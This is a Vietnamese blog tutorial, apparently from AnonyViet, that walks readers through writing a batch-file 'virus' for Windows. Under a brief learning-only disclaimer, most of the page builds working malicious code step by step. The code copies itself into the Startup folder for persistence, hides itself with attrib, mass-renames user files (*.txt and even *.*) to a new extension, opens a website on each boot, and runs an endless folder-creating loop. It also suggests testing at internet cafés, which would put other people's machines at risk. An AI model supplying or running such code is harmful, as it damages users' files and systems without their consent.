Hướng dẫn tự viết Virus cực mạnh phá Windows

Chào các bạn, hôm nay AnonyViet sẽ hướng dẫn chi tiết các bạn viết một chương trình Virus cực kỳ đơn giản, qua bài viết này sẽ giúp các bạn nắm thêm kiến thức về lệnh CMD trong Windows, từ đó làm nền tảng để hiểu thêm Power Shell nếu bạn nào thích nghiên cứu chuyên sâu.

Trong bài này chúng tôi sẽ diễn giải các lệnh cơ bản nhất của CMD, và tùy theo tư duy các bạn có thể phát triển để virus này nguy hiểm hơn. Tuy nhiên với mục đích là để tìm tòi nghiên cứu học hỏi chứ không phải phá hoại, do đó các bạn đừng nên sử dụng kiến thức của mình đi để phá người khác nhé.

Bây giờ chúng ta sẽ đi từng lệnh cụ thể trong CMD, sau đó ráp lại thành 1 bộ code hoàn chỉnh để thực thi virus nhé.

Bài 1: Hướng dẫn tự viết Virus cực mạnh phá Windows

Bài 2: Tăng thêm sức mạnh cho Virus phá Windows

Chuẩn bị

• Notepad
• Mở CMD (nhấn phím Windows R, gõ lên cmd)
• Dùng máy ảo hoặc ra quán net để Test

Xác định thư mục làm việc

Trước tiên ta cần trỏ dấu nhắc đợi lệnh về 1 đường dẫn cố định để dễ test. Trong bài này, mình sẽ để đường dẫn là ổ đĩa D: cho dễ quản lý

Gõ lệnh:

D:

khi đấy đường dẫn làm việc của ta sẽ là ổ đĩa D:

Tạo File bằng lệnh echo

Để tạo ra con virus tất nhiên bạn phải ra file chứa các lệnh thực thi con virus ấy, trong CMD chúng ta dùng lệnh echo để tạo file có nội dung, với cấu trúc lệnh như sau:

echo > virus.bat

Lệnh này cho phép ta tạo ra một file tên là virus.bat, nhưng chưa có nội dung.

Tiếp đến ta thêm nội dung cho file virus.bat bằng lệnh:

echo off: dùng để tắt hiển thị lệnh khi thực thi file

echo echo off > x.bat
echo "noi dung dong 1" >> virus.bat 
echo "noi dung dong 2" >> virus.bat
echo "noi dung dong 3" >> virus.bat

Tóm lại:

• 1 dấu > là tạo file
• 2 dấu >> là thêm nội dung file

Bây giờ chúng ta truy cập vào ổ đĩa D: sẽ thấy có 1 file tên là virus.bat, và dùng notepad để mở file này nên sẽ thấy các nội dung như hình bên dưới

 

Đổi màu chữ trong CMD

Để làm con em virus thêm sinh động thì chúng ta có thể đổi màu chữ từ màu trắng cổ điển sau các màu khác như xanh, đỏ, tím, vàng…. Bạn sử dụng lệnh: color số quy định màu.

Ví dụ: để chuyển chữ sang màu xanh lá cây, mã màu là số 2 thì ta gõ lệnh

color 2

Dùng lệnh Copy để sao chép

Nếu muốn Virus này ẩn mình vào 1 thư mục nào đó, hoặc muốn cho em virus này khởi động theo Windows, mỗi lần khởi động Windows lên Virus sẽ tự thực thi, thì cần cho nó tự sao chép vào đường dẫn Startup.

Thư mục nơi chứa các tập tin để được khởi động cùng Windows được quy định là

"C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

Do đó ta cần copy con Virus này vào thư mục trên, sử dụng lệnh Windows

copy virus.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

 

Cách ẩn mình của Virus

Để ẩn mình, tránh sự phát hiện bằng mắt thường, mình sẽ dùng lệnh attrib để tự đặt chế độ ẩn file.

Do mình đã copy virus này vào thư mục Startup, nên cần phải di chuyển dấu nhắc đợi lệnh về thư mục đó, dùng lệnh cd để di chuyển dấu nhắc

cd "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

Tiếp đến dùng lệnh attrib để ẩn file

attrib +h virus.bat

Đổi đuôi File

Để tăng phần nguy hiểm cho Virus thì chúng ta sẽ cho đổi đuôi tất cả các File tìm thấy về 1 đuôi khác do bạn quy định, dùng lệnh ren.

Ví dụ: để đổi tất cả các file có đuôi .exe về đuôi .anonyviet thì ta dùng lệnh:

ren *.exe *.anonyviet

Ví dụ: để đổi tất cả các file và tất cả các đuôi về đuôi .anonyviet thì ta dùng lệnh:

ren *.* *.anonyviet

*.*  //tất cả các file và tất cả các đuôi

*.anonyviet  // đổi hết về đuôi .anonyviet

Thực thi File

Để virus tự kích hoạt một file bất kỳ hoặc kích hoạt chính mình thì dùng lệnh

start “tên chương trình muốn kích hoạt”

Ví dụ: muốn Virus tự mở website anonyviet.con thì dùng lệnh

start https://anonyviet.com

Ví dụ: muốn Virus tự mở kích hoạt file virus.bat

start d:\virus.bat

Vòng lặp

Các bạn mở 1 file notepad ra và gõ lệnh bên dưới, sau đó save 1 file với len vonglap.bat, để xem cách hoạt động nhé

Các bạn xem ví dụ bên dưới nhé:

@echo off
d:  
cd virus
:x
md %random% 
goto x

d:                     //đi đến thư mục làm việc ổ đĩa D:

md anonyviet     // tạo thư mục có tên

cd anonyviet       // di chuyển con trỏ vào thư mục anonyviet

: x là điểm bắt đầu vòng lặp

md: lệnh tạo thư mục

%ramdom%: lệnh tạo ra các con số ngẫu nhiên

goto x trở về điểm bắt đầu

Như vậy, đường đi sẽ là:

1. Lệnh thực thi đến phần x,
2. Nó sẽ tạo ra 1 thư mục với tên ngẫu nhiên,
3. Gặp goto x lệnh sẽ quay lại x
4. Và tiếp tục tạo 1 thư mục với tên ngẫu nhiên
5. Rồi gặp goto x, nó lại quay về x
6. Và tiếp tục tạo thư mục

Tạo nên 1 vòng lặp vô tận.

Bài tập viết virus đơn giản bằng cmd:

Hoàn thành code 1 virus đơn giản với yêu cầu

1. Tạo ra tạo 1 file có tên virus.bat nằm trong ổ đĩa D:
2. Nội dung file virus.bat hiển thị dòng chữ AnonyViet is Attacking, có màu xanh lá cây
3. File Virus này sẽ đổi đuôi tất cả tập tin .txt trong ổ D về thành đuôi .anonyviet
4. Tự copy vào thư mục Startup của Windows
5. Tự ẩn giấu mình
6. Tự kích hoạt anonyviet.bat

OK bây giờ chúng ta mở notepad lên và gõ các lệnh như sau:

Bài giải:

Bước 1: Mở notepad lên và gõ lại theo các lệnh dưới đây,

Bước 2: save file notepad là baigiai.bat

Bước 3: Thực thi file baigiai.bat và xem kết quả

Bước 4: Khởi động lại máy và xem kết quả

Chi tiết bài giải

1. Tạo ra tạo 1 file anonyviet.bat trong ổ D: bằng lệnh echo

D:
echo @echo off > anonyviet.bat
echo color 2 >> anonyviet.bat
echo echo. AnonyViet is Attacking >> anonyviet.bat

2. File Virus này sẽ đổi đuôi tất cả tập tin .txt trong ổ D về thành đuôi .anonyviet

D:
echo @echo off > anonyviet.bat
echo color 2 >> anonyviet.bat
echo echo. AnonyViet is Attacking >> anonyviet.bat

3. File Virus này sẽ đổi đuôi tất cả tập tin .txt trong ổ D về thành đuôi .anonyviet

D:
echo @echo off > anonyviet.bat
echo color 2 >> anonyviet.bat
echo echo. AnonyViet is Attacking >> anonyviet.bat
echo ren *.txt *.anonyviet >> anonyviet.bat

4. Tự mở trang web https://anonyviet.com

D:
echo @echo off > anonyviet.bat
echo color 2 >> anonyviet.bat
echo echo. AnonyViet is Attacking >> anonyviet.bat
echo ren *.txt *.anonyviet >> anonyviet.bat
echo start https://anonyviet.com

4. Tự copy vào thư mục Startup của Windows

D:
echo @echo off > anonyviet.bat
echo color 2 >> anonyviet.bat
echo echo. AnonyViet is Attacking >> anonyviet.bat
echo ren *.txt *.anonyviet >> anonyviet.bat
echo start https://anonyviet.com
copy anonyviet.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

5. Tự ẩn giấu mình

D:
echo @echo off > anonyviet.bat
echo color 2 >> anonyviet.bat
echo echo. AnonyViet is Attacking >> anonyviet.bat
echo ren *.txt *.anonyviet >> anonyviet.bat
echo start https://anonyviet.com >> anonyviet.bat
copy anonyviet.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" 
echo attrib +h "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anonyviet.bat" >> anonyviet.bat
echo pause >> anonyviet.bat

6. Thực thi file anonyviet.bat

D:
echo @echo off > anonyviet.bat
echo color 2 >> anonyviet.bat
echo echo. AnonyViet is Attacking >> anonyviet.bat
echo ren *.txt *.anonyviet >> anonyviet.bat
echo start https://anonyviet.com >> anonyviet.bat
copy anonyviet.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" 
echo attrib +h "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anonyviet.bat" >> anonyviet.bat
echo pause >> anonyviet.bat
start anonyviet.bat

Bây giờ bạn Save code này vào notepad đặt tên baigiai.bat

Rồi khởi động file baigiai.bat để xem kết quả

Như vậy với các đoạn code trên, mỗi khi ban khởi động Windows, nó sẽ tự tìm kiếm trong ổ D các file có đuôi .txt sẽ tự chuyển qua đuôi .anonyviet và khởi động là website của AnonyViet lên.

Bài thứ 2 mình đang viết, sẽ thêm sức mạnh cho con virus này, các bạn đón đọc nhé